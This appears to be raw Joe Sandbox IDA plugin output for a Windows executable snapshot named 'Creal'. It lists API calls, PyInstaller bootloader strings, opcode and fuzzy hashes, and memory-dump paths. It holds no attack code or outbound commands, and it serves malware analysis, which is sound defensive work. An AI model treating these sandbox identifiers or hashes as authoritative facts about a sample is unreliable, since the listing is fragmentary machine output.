                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction ID: e892f0837ace082600236e75137d066ff9c9de858a8304ebe6160bd2fe677e95
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37319536628F8186EB60CF25E9402AE73A4FB88758F540136EA9D83B98DF3CD555CB40
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                        • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                        • Instruction ID: c5ddc048e099199de1637b0649a021cad54cb74c176c1098b036de56783ecf5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03B1A522B3869241FA619F2196121BD63A1EF85BE4F445133DA5D87FDADE3CF461C380
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245840
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245852
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245889
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924589B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458B4
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458C6
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458DF
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458F1
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924590D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924591F
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924593B
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924594D
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245969
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924597B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245997
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92459A9
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92459C5
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92459D7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                        • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction ID: 96a26c9935e6063a934eb45478fae5e81f29b7f3701d4e7b03b3a1a5d4f336a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC22C860A2EB0791FA19FF96AE1457C23A5AF19741F445037C95E82AA1FF3CB478C380
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9249390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92445F4,00000000,00007FF6D9241985), ref: 00007FF6D92493C9
                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6D92486B7,?,?,00000000,00007FF6D9243CBB), ref: 00007FF6D924822C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242810: MessageBoxW.USER32 ref: 00007FF6D92428EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                        • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                        • Instruction ID: 156760c5f651e81842da51f12cbf3d22bc86fba98d12fdeee567a82f5d0e316b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66516711A3DA8241FB51DF25EB516BE67A0AFA8784F444433DA0EC6AD5EE3CE524CB40
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction ID: 2ad318d09c31b01384c84aece63c5d37d4ad13c3e219e85cbc35539fd67edcfd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6551C8266187A186E6349F36E4181BEB7A1F798B61F004126EFDE83694DF3CD055DB10
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                        • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction ID: 10e5255e5a3970cd0e2e5b1ea774b2a911777a1e41fe8763d67911bd5c4ae01d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE219F21B3DA4282FB418F7AAE5417D6350EF98B90F484233DA2EC3BD4DE3CD5A18640
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction ID: ff251f95c1c907146073f5f1bdb0616310ae8540ad0dcb1e5908bc13350ca6ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B129372E2C24386FBA05E14D35867F76A2FB50754F844137E68986ADCDF3CE9A48B04
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction ID: c775a23e9d90dbb507fe37823e92e50a14423abe72f6b41915dfa5909911dd22
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA12A672E2C14386FBA45E14E25667D76A1FB40754F884033E69AC7ACDDF7CE8A08B10
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242C9E
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242D63
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6D9242D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DD4D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DD5B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DD85
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DDF3
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DDFF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6D924351A,?,00000000,00007FF6D9243F23), ref: 00007FF6D9242AA0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9248EFD
                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9248F5A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9249390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92445F4,00000000,00007FF6D9241985), ref: 00007FF6D92493C9
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9248FE5
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9249044
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9249055
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D924906A
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B2D7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B30D
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B33A
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B34B
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B35C
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B377
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
